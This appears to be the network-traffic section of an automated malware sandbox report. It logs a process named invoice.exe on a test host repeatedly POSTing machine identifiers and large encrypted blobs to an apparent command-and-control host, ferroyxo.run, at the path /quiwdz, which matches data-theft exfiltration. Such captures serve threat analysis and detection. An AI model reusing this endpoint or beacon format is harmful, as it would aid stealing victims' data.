                                                                        Data Ascii: 01W/UU(,bAs`9];WRyEK,Zv)-h=[#U%OkbE}(+7-{GbH_n(~E&?4r':3]-_5I[Vc6;7`y?*a6y|^CT,cUJE/6vB,
                                                                        2025-04-02 09:42:46 UTC1369INData Raw: 7b fd ef 5e 65 91 6e e0 d6 18 4a 07 e8 2d 08 0f df d8 bb fb a1 df 9b db 67 a2 53 1d cb 6d 6d 7c c4 1f cb 2a c7 14 53 31 aa a1 87 d1 ee 12 29 8c c3 cf 7c 08 f4 81 c2 89 0b c4 ad 81 19 7f 7f 90 dc aa 1f c7 44 3a 57 4a d2 c4 26 79 b7 91 0c 60 ce cf 76 87 c6 70 8f 9b be 77 91 4a d8 84 3d 0f 72 7f 98 ad 08 4c a6 cf 60 b8 7e ac 90 60 03 53 eb 6b 9c 4a 9c f3 5c 78 c6 71 e8 7d 84 29 b4 ed 8e 16 5c 55 30 2c fd bc e6 8b 36 36 ff 5a 5f 3e 99 ab f8 38 2c 82 15 3b e4 00 05 b6 6f ac 98 ac 18 52 71 1a 9a c9 b3 7c 09 4a 9c b9 5d fd 51 1a 47 d2 8a b4 8e 56 02 5f 64 65 a7 b7 ea 07 e1 98 25 1e 17 ba 4f 67 89 e0 9c 9c df 07 8a 13 fe a0 af 79 83 4a 39 c0 4f 11 55 24 69 d3 2e 63 3b 99 23 2b 8e 43 09 6a 28 4e 29 82 fc da ca 21 19 f9 c4 4b 5f f8 e0 95 d2 f3 c0 95 4d 26 cd d4 6c
                                                                        Data Ascii: {^enJ-gSmm|*S1)|D:WJ&y`vpwJ=rL`~`SkJ\xq})\U0,66Z_>8,;oRq|J]QGV_de%OgyJ9OU$i.c;#+Cj(N)!K_M&l
                                                                        2025-04-02 09:42:46 UTC211INData Raw: a4 c1 b2 76 e4 df f4 6b 7a 0a cd 45 5f 1e 43 52 d2 1f 99 13 0f 6a 65 12 a7 14 d5 1a 59 a2 a0 76 18 45 8a 04 bb 23 57 af 46 92 51 24 07 8b ff b4 d8 c8 f5 8c 46 b2 58 b8 97 75 3e 3e 16 03 a6 ee 52 16 04 b7 2d d9 58 1a 49 97 ab eb 04 06 94 08 cc 27 ad d6 cb 29 a0 1e f5 fd 1a 16 75 03 b0 04 e6 ab ce 77 21 d1 f3 f6 4d cf 69 a0 39 66 9c d7 57 34 17 ee 34 c5 bc a7 c3 13 92 9c c5 28 64 95 f3 ab 0f 55 26 99 51 2a 64 c8 be 44 10 c2 3a 21 7d f3 cb a0 75 e2 e8 1e 86 5a aa 17 2d a3 84 45 cd d5 12 6a f6 a6 dc 3a bc 65 db 28 4a ac fa f9 4f e1 74 ea e3 1d 1e d1 65 24 d7 ce a9 b6 0e e2 c7 7b b6 11 e0 db e9 98 8f f0 9c 6b 54 63 d0 81 73 fe 75
                                                                        Data Ascii: vkzE_CRjeYvE#WFQ$FXu>>R-XI')uw!Mi9fW44(dU&Q*dD:!}uZ-Ej:e(JOte${kTcsu


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        1 | 192.168.2.7 | 49682 | 172.67.131.170 | 443 | 6892 | C:\Users\user\Desktop\invoice.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2025-04-02 09:42:46 UTC | 279 | OUT | POST /quiwdz HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=v3zzUIS0f2zrKhOW
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                        Content-Length: 14498
                                                                        Host: ferroyxo.run
                                                                        2025-04-02 09:42:46 UTC14498OUTData Raw: 2d 2d 76 33 7a 7a 55 49 53 30 66 32 7a 72 4b 68 4f 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 65 39 31 64 62 61 33 33 34 64 31 33 62 33 38 36 32 64 35 66 63 66 31 63 30 37 66 35 34 66 38 32 66 32 65 34 62 38 39 37 39 39 0d 0a 2d 2d 76 33 7a 7a 55 49 53 30 66 32 7a 72 4b 68 4f 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 76 33 7a 7a 55 49 53 30 66 32 7a 72 4b 68 4f 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 46 43 32 30 34 44 46
                                                                        Data Ascii: --v3zzUIS0f2zrKhOWContent-Disposition: form-data; name="uid"e91dba334d13b3862d5fcf1c07f54f82f2e4b89799--v3zzUIS0f2zrKhOWContent-Disposition: form-data; name="pid"2--v3zzUIS0f2zrKhOWContent-Disposition: form-data; name="hwid"4DFC204DF
                                                                        2025-04-02 09:42:47 UTC | 804 | IN | HTTP/1.1 200 OK
                                                                        Date: Wed, 02 Apr 2025 09:42:47 GMT
                                                                        Content-Type: application/json
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UBWvPYFn%2B8y3r3lKdSlLYn5v9v1VMznHGBYCIaDSLFgAcXsRzpMfoLzn9tPUvvJxCKTGSANVgFOJz%2BCcJFVyQ2JkLm%2BH1oAm3X3L2U001b11UrF2QWATsyeAD9AxisY%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 929f60cf1c949a1a-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=97717&min_rtt=97498&rtt_var=20896&sent=11&recv=19&lost=0&retrans=0&sent_bytes=2827&recv_bytes=15435&delivery_rate=37956&cwnd=188&unsent_bytes=0&cid=cf65c3c420713577&ts=542&x=0"
                                                                        2025-04-02 09:42:47 UTC73INData Raw: 34 33 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d 7d 0d 0a
                                                                        Data Ascii: 43{"success":{"message":"message success delivery from 161.77.13.2"}}
                                                                        2025-04-02 09:42:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        2 | 192.168.2.7 | 49683 | 172.67.131.170 | 443 | 6892 | C:\Users\user\Desktop\invoice.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2025-04-02 09:42:48 UTC | 281 | OUT | POST /quiwdz HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=1f0d8SnvYvUO656QMv
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                        Content-Length: 15070
                                                                        Host: ferroyxo.run
                                                                        2025-04-02 09:42:48 UTC15070OUTData Raw: 2d 2d 31 66 30 64 38 53 6e 76 59 76 55 4f 36 35 36 51 4d 76 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 65 39 31 64 62 61 33 33 34 64 31 33 62 33 38 36 32 64 35 66 63 66 31 63 30 37 66 35 34 66 38 32 66 32 65 34 62 38 39 37 39 39 0d 0a 2d 2d 31 66 30 64 38 53 6e 76 59 76 55 4f 36 35 36 51 4d 76 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 31 66 30 64 38 53 6e 76 59 76 55 4f 36 35 36 51 4d 76 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 46
                                                                        Data Ascii: --1f0d8SnvYvUO656QMvContent-Disposition: form-data; name="uid"e91dba334d13b3862d5fcf1c07f54f82f2e4b89799--1f0d8SnvYvUO656QMvContent-Disposition: form-data; name="pid"2--1f0d8SnvYvUO656QMvContent-Disposition: form-data; name="hwid"4DF
                                                                        2025-04-02 09:42:48 UTC | 806 | IN | HTTP/1.1 200 OK
                                                                        Date: Wed, 02 Apr 2025 09:42:48 GMT
                                                                        Content-Type: application/json
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1W%2BhfeQ9Nwr9DaoRGNkVB0OlZlgtH%2FNxfcMWnj838J9s4Ssrm9QF%2Bqxv54vKp7iOwabEzi%2BLGprpzHddi2BYAnBI49v5nEeqJQZL3CtXJ0QYJ9QN5sQnVGcJGdSa4UY%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 929f60d7ccde086e-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=97765&min_rtt=96783&rtt_var=21305&sent=11&recv=20&lost=0&retrans=0&sent_bytes=2827&recv_bytes=16009&delivery_rate=38408&cwnd=225&unsent_bytes=0&cid=b50273a415550767&ts=556&x=0"
                                                                        2025-04-02 09:42:48 UTC73INData Raw: 34 33 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d 7d 0d 0a
                                                                        Data Ascii: 43{"success":{"message":"message success delivery from 161.77.13.2"}}
                                                                        2025-04-02 09:42:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        3 | 192.168.2.7 | 49684 | 172.67.131.170 | 443 | 6892 | C:\Users\user\Desktop\invoice.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2025-04-02 09:42:49 UTC | 275 | OUT | POST /quiwdz HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=d2pj0dUd2nx8
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                        Content-Length: 20365
                                                                        Host: ferroyxo.run
                                                                        2025-04-02 09:42:49 UTC15331OUTData Raw: 2d 2d 64 32 70 6a 30 64 55 64 32 6e 78 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 65 39 31 64 62 61 33 33 34 64 31 33 62 33 38 36 32 64 35 66 63 66 31 63 30 37 66 35 34 66 38 32 66 32 65 34 62 38 39 37 39 39 0d 0a 2d 2d 64 32 70 6a 30 64 55 64 32 6e 78 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 64 32 70 6a 30 64 55 64 32 6e 78 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 46 43 32 30 34 44 46 30 44 39 32 36 38 44 46 33 45 39 36
                                                                        Data Ascii: --d2pj0dUd2nx8Content-Disposition: form-data; name="uid"e91dba334d13b3862d5fcf1c07f54f82f2e4b89799--d2pj0dUd2nx8Content-Disposition: form-data; name="pid"3--d2pj0dUd2nx8Content-Disposition: form-data; name="hwid"4DFC204DF0D9268DF3E96
                                                                        2025-04-02 09:42:49 UTC5034OUTData Raw: 50 0b 86 af f1 d1 d0 c9 04 8f c0 d7 d3 68 b8 33 3b f8 1d 44 c3 e0 2f c4 2b 2c ed 18 73 1a 1f ac da 42 34 cc fc 79 07 0e a9 9d 4f 84 67 b9 38 b1 a7 f5 a9 73 7a 30 99 a4 11 34 a9 8a 36 88 48 d3 a6 e7 ff 4a 5b 55 8c 09 cb ce 35 c3 a5 e2 71 5c 63 e9 79 03 95 c1 54 81 56 3e 75 f9 26 a9 57 7d ca ca fc 49 9e 8c ce bf ec 48 1e 71 51 4d 5c da 14 03 a7 21 64 08 02 33 0b 9a 56 d4 0e d4 35 d8 94 cf e5 88 99 37 9c 61 db 83 dd 4e a0 48 f5 06 5a de cf e3 82 26 60 81 9f 21 c5 9e 60 fd 82 80 9e 45 83 0f 64 bf 62 f8 61 69 f6 dd 81 42 0e d6 64 ca bd 2a bd f4 6b c7 fb 75 89 5e b3 fd 07 e0 7e 0a b2 8d db b6 04 aa 36 53 7d d3 6f c2 f0 c8 53 23 4e 10 c5 c4 ac af 1c 3e b7 2b c2 42 45 ff 16 b0 4e 2b 7f 31 e1 db 1f 5d c8 8a 7c ef fe 9c c5 c2 59 c8 26 e0 33 0a 25 91 39 ef c0 56 b4
                                                                        Data Ascii: Ph3;D/+,sB4yOg8sz046HJ[U5q\cyTV>u&W}IHqQM\!d3V57aNHZ&`!`EdbaiBd*ku^~6S}oS#N>+BEN+1]|Y&3%9V
                                                                        2025-04-02 09:42:49 UTC | 806 | IN | HTTP/1.1 200 OK
                                                                        Date: Wed, 02 Apr 2025 09:42:49 GMT
                                                                        Content-Type: application/json
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5d4Y8TPuKukFnrldtSLoF2wXiYX5xK1%2B3gU%2FDS%2F9P7LmkPzEvau4ECzI2OnXPAp5R%2Bva8oIkL8GZGI5aXoCPqXkJYkKHvtoDMyHk7AB98i3pBZiuUUP8HcjBrx4FfuM%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 929f60de1fb31705-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=99178&min_rtt=98511&rtt_var=21790&sent=13&recv=24&lost=0&retrans=0&sent_bytes=2828&recv_bytes=21320&delivery_rate=37036&cwnd=233&unsent_bytes=0&cid=446ec87f5fca2a0b&ts=593&x=0"
                                                                        2025-04-02 09:42:49 UTC73INData Raw: 34 33 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d 7d 0d 0a
                                                                        Data Ascii: 43{"success":{"message":"message success delivery from 161.77.13.2"}}
                                                                        2025-04-02 09:42:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        4 | 192.168.2.7 | 49685 | 172.67.131.170 | 443 | 6892 | C:\Users\user\Desktop\invoice.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2025-04-02 09:42:51 UTC | 281 | OUT | POST /quiwdz HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=04CpSY8Q9xhdWEUI49d
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                        Content-Length: 2404
                                                                        Host: ferroyxo.run
                                                                        2025-04-02 09:42:51 UTC2404OUTData Raw: 2d 2d 30 34 43 70 53 59 38 51 39 78 68 64 57 45 55 49 34 39 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 65 39 31 64 62 61 33 33 34 64 31 33 62 33 38 36 32 64 35 66 63 66 31 63 30 37 66 35 34 66 38 32 66 32 65 34 62 38 39 37 39 39 0d 0a 2d 2d 30 34 43 70 53 59 38 51 39 78 68 64 57 45 55 49 34 39 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 34 43 70 53 59 38 51 39 78 68 64 57 45 55 49 34 39 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a
                                                                        Data Ascii: --04CpSY8Q9xhdWEUI49dContent-Disposition: form-data; name="uid"e91dba334d13b3862d5fcf1c07f54f82f2e4b89799--04CpSY8Q9xhdWEUI49dContent-Disposition: form-data; name="pid"1--04CpSY8Q9xhdWEUI49dContent-Disposition: form-data; name="hwid"
                                                                        2025-04-02 09:42:51 UTC | 264 | IN | HTTP/1.1 200 OK
                                                                        Date: Wed, 02 Apr 2025 09:42:51 GMT
                                                                        Content-Type: application/json
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Server: cloudflare
                                                                        Vary: Accept-Encoding
                                                                        Cf-Cache-Status: DYNAMIC
                                                                        CF-RAY: 929f60ea7c4a437e-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        2025-04-02 09:42:51 UTC73INData Raw: 34 33 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d 7d 0d 0a
                                                                        Data Ascii: 43{"success":{"message":"message success delivery from 161.77.13.2"}}
                                                                        2025-04-02 09:42:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        5 | 192.168.2.7 | 49686 | 172.67.131.170 | 443 | 6892 | C:\Users\user\Desktop\invoice.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2025-04-02 09:42:52 UTC | 276 | OUT | POST /quiwdz HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=fbxl3f5CQUpt
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                        Content-Length: 568670
                                                                        Host: ferroyxo.run
                                                                        2025-04-02 09:42:52 UTC15331OUTData Raw: 2d 2d 66 62 78 6c 33 66 35 43 51 55 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 65 39 31 64 62 61 33 33 34 64 31 33 62 33 38 36 32 64 35 66 63 66 31 63 30 37 66 35 34 66 38 32 66 32 65 34 62 38 39 37 39 39 0d 0a 2d 2d 66 62 78 6c 33 66 35 43 51 55 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 66 62 78 6c 33 66 35 43 51 55 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 46 43 32 30 34 44 46 30 44 39 32 36 38 44 46 33 45 39 36
                                                                        Data Ascii: --fbxl3f5CQUptContent-Disposition: form-data; name="uid"e91dba334d13b3862d5fcf1c07f54f82f2e4b89799--fbxl3f5CQUptContent-Disposition: form-data; name="pid"1--fbxl3f5CQUptContent-Disposition: form-data; name="hwid"4DFC204DF0D9268DF3E96
                                                                        2025-04-02 09:42:52 UTC15331OUTData Raw: 22 f9 12 5e d4 b0 45 b6 ea 1c 38 14 8a 7a e2 ad c0 d5 29 2e 17 37 f9 13 7c c9 d2 2b 57 82 bc 0b c5 40 37 ba f4 1d 0a 73 64 15 07 c0 dd c0 8b b8 40 88 ab 0b e3 87 f6 67 68 1a c1 77 75 fa 29 aa 67 55 81 f4 8e 25 c0 48 94 dd c2 8a e6 16 f9 a9 a4 ce 11 f4 75 de 18 0c a3 03 a8 b4 eb a6 15 5c 07 b6 b4 95 4c c5 0b ba 4b 7d d7 46 7d 7c 86 7f d0 8c f9 90 53 9d be f0 d1 b9 50 32 b8 70 34 1a d0 c3 3b 6e 13 ac b2 6d c8 17 c6 97 fd 6e 88 e9 d4 74 3d 38 9a a7 b9 58 cb 40 7a 1d 20 9a bd b1 d2 d2 99 60 c9 d2 38 37 bd 87 fd 24 8c 07 46 06 46 a8 ff 2c 7c ed 20 e5 50 dd d7 37 64 6d ad 55 21 d2 21 6c 65 78 f0 62 2a 93 5d 4d b0 1e fb 66 54 dc 3b ad ba fd 3e f8 8d 7d 91 bd bc 6b c6 0e 5b be d9 f6 2e 5c 6f de 44 90 47 6c 98 50 2e 14 eb 8f 90 69 c4 0d c9 78 6e 80 9c d2 ee 00 5a
                                                                        Data Ascii: "^E8z).7|+W@7sd@ghwu)gU%Hu\LK}F}|SP2p4;nmnt=8X@z `87$FF,| P7dmU!!lexb*]MfT;>}k[.\oDGlP.ixnZ
                                                                        2025-04-02 09:42:52 UTC15331OUTData Raw: fb 88 41 9b f9 1e 98 ef c6 ca c9 f3 0c 14 2c f7 45 52 bf 51 a3 7e 96 10 3f 0a 21 1f a3 79 2d ff 6c 45 e3 f0 f0 2f b7 6d 7c bc 69 2c c5 85 c3 1c fa fa 37 d2 ff b2 a5 59 e7 5d df cd 88 ec 6f 07 c1 d4 1b da 3f 85 ba 83 9e cf 19 84 92 e2 67 d8 07 34 14 ea da 41 b6 e2 38 d6 ac 80 33 97 6d be b2 a6 0f 54 97 4a 8e 25 ce 2b ab fa e8 ce e8 02 d0 4c 2e 8d b8 57 4d 60 cf c0 ec 0a 8d fe 41 4e f4 d4 93 89 9a 7f 05 71 50 d3 b8 0e c2 e8 16 0d 83 fe fe c5 02 fb 68 b4 d3 72 8b 77 e8 86 f2 25 2b c3 55 37 9e 8f 5f f3 c8 af 59 a8 4a 83 0a 05 96 05 03 0e 9e ed 8e 41 db 94 02 2c b4 96 45 15 d1 9d 4a 18 fb ac 40 3f 04 77 f5 fe 20 62 e0 e6 d6 06 84 bd 67 a0 4c b9 0a fb 3a 0c 93 ee e5 b1 db 12 67 cc b6 3d f0 fe 42 36 6f 86 69 1e f6 a6 d7 6f 18 fb b6 e8 8a 39 9c a1 75 76 60 5a 45
                                                                        Data Ascii: A,ERQ~?!y-lE/m|i,7Y]o?g4A83mTJ%+L.WM`ANqPhrw%+U7_YJA,EJ@?w bgL:g=B6oio9uv`ZE
                                                                        2025-04-02 09:42:52 UTC15331OUTData Raw: ad e7 a4 bd db 30 e2 d4 62 7e 43 00 fa 69 26 98 38 89 a8 6b 5b 49 97 3a 2f d1 fe 36 83 58 23 cd 93 44 7d 59 c1 7f 05 b6 eb cc 95 b9 b1 1a 1d 9f ac 79 33 71 1c 00 c1 05 b4 0a 1c 5a c8 e2 aa d7 44 f7 35 82 f1 4f e7 4c 45 59 44 46 51 28 fb 2d 45 ff 86 dd 53 08 3a e5 37 2f 56 6a f6 a5 a4 02 66 64 f1 99 58 db b2 b3 5d 05 fb f9 85 74 0c b1 e7 b5 4d c9 0a 7c c9 61 83 3c 4f cc 2d e7 9a 22 92 d3 f3 8d 5d 1b 2d bb 40 1a 1c b9 f6 87 45 92 45 85 b3 e4 0e 6e 12 35 56 e5 30 86 d4 56 c5 f7 88 e9 39 95 1d f3 c9 ab 7c 26 fc 38 9a 23 92 dd 88 66 16 fe b6 36 25 ae 3a 2e c9 a2 da 56 18 c4 58 8f bf 3f 29 4f a1 e6 96 74 e8 8e 16 26 15 ba 11 7c 92 a5 ac ee b1 8a 6d b8 9a ad 2b de 9b f6 b1 49 bb bb 4e c9 25 8a 55 27 d8 ea 27 e0 8f a4 11 8d 30 45 19 37 ad 74 77 62 ea 06 e5 ee 1b
                                                                        Data Ascii: 0b~Ci&8k[I:/6X#D}Yy3qZD5OLEYDFQ(-ES:7/VjfdX]tM|a<O-"]-@EEn5V0V9|&8#f6%:.VX?)Ot&|m+IN%U''0E7twb
                                                                        2025-04-02 09:42:52 UTC15331OUTData Raw: c6 76 56 08 ea 1c d0 44 50 2b 91 c0 48 7b 0f 64 d3 c6 1c a0 8c e7 90 ac 7f 0f 3a be 59 45 b7 71 5c 39 68 b8 22 c5 d8 22 b1 d2 0c 9c eb 2c d7 6a 58 38 82 72 42 cc 34 d4 81 8b 38 41 45 95 21 6d fe 9c e2 08 b8 4d f0 67 c7 e3 0d 67 c7 e9 17 45 1b c8 9c ac d4 52 66 40 32 40 ee 0e 75 fc 50 01 a6 f1 37 d2 db 50 16 17 15 fe c2 51 46 9f b5 95 ad 8b 61 dd 73 de ea de 7b ff 94 48 35 da aa d1 8e ef 12 a9 7b fa be 8d bd fc 63 37 0a fc f0 8e ce 46 d4 c1 78 4a 9a fa b9 54 ae ab ca 6c 05 c9 20 71 cc 29 2a 0d 6f 9b d4 ec 0b 8d 52 b5 6d 07 31 87 16 94 cc 38 33 37 b1 f1 4c 7a ef c7 67 69 44 3c e3 d0 30 63 60 0a d2 00 fe cc 4c d2 c3 0a 60 49 b8 bb 0b 1c ff f1 86 8e 30 8c d0 13 93 cb 9d 9e da ec 85 52 2f f7 d0 cb ab d7 8e e2 10 1f d2 c8 32 e6 56 54 a9 17 d3 d4 4f 04 0b 1a 05
                                                                        Data Ascii: vVDP+H{d:YEq\9h"",jX8rB48AE!mMggERf@2@uP7PQFas{H5{c7FxJTl q)*oRm1837LzgiD<0c`L`I0R/2VTO
                                                                        2025-04-02 09:42:52 UTC15331OUTData Raw: de 8c 32 7f 60 c1 68 30 12 e7 4d d0 29 9f 3d aa 71 44 03 d9 5b bd 6d de 6c 51 01 f5 95 04 e6 df 93 21 32 fd f7 67 fe 55 84 7b 2d 19 fe 08 b4 c0 d6 34 b2 2f 48 f2 c9 7c bd 0a 05 da 35 77 f0 68 ed a0 e6 17 ce 61 8a 74 17 a7 90 49 93 30 1a 32 ff c3 93 b1 cd a0 68 a5 f8 89 d7 67 1d b1 8d 15 3e 27 4e 68 8a 1f 2f bc 9c 39 5b ac d8 d5 32 7a de 6f 71 99 4f 90 d0 fe a6 9a fc f7 5d af 76 1b a8 3a dd d1 be eb 7f 2f 12 a7 23 96 56 dc ee fd 52 2d f5 8e 2d fd 63 55 aa e6 14 7d af 73 e1 78 b1 0c 5d d2 b0 6f b7 2b 51 c6 ec e8 b7 cb a1 1e b1 12 30 69 12 60 b3 13 89 9d 7a 70 0c e5 25 5b ec f9 cc 73 44 ec 31 8f 0f 1d f7 96 b5 e5 43 9b 49 9a 36 ec 89 45 38 a4 f7 60 a4 90 46 50 42 a0 64 35 3b a5 04 77 7c d8 9a ea 1d 6d e5 2b 8d 9d 51 bf d9 f8 e2 64 b8 9e 6f 8a a6 98 47 8f 2f
                                                                        Data Ascii: 2`h0M)=qD[mlQ!2gU{-4/H|5whatI02hg>'Nh/9[2zoqO]v:/#VR--cU}sx]o+Q0i`zp%[sD1CI6E8`FPBd5;w|m+QdoG/
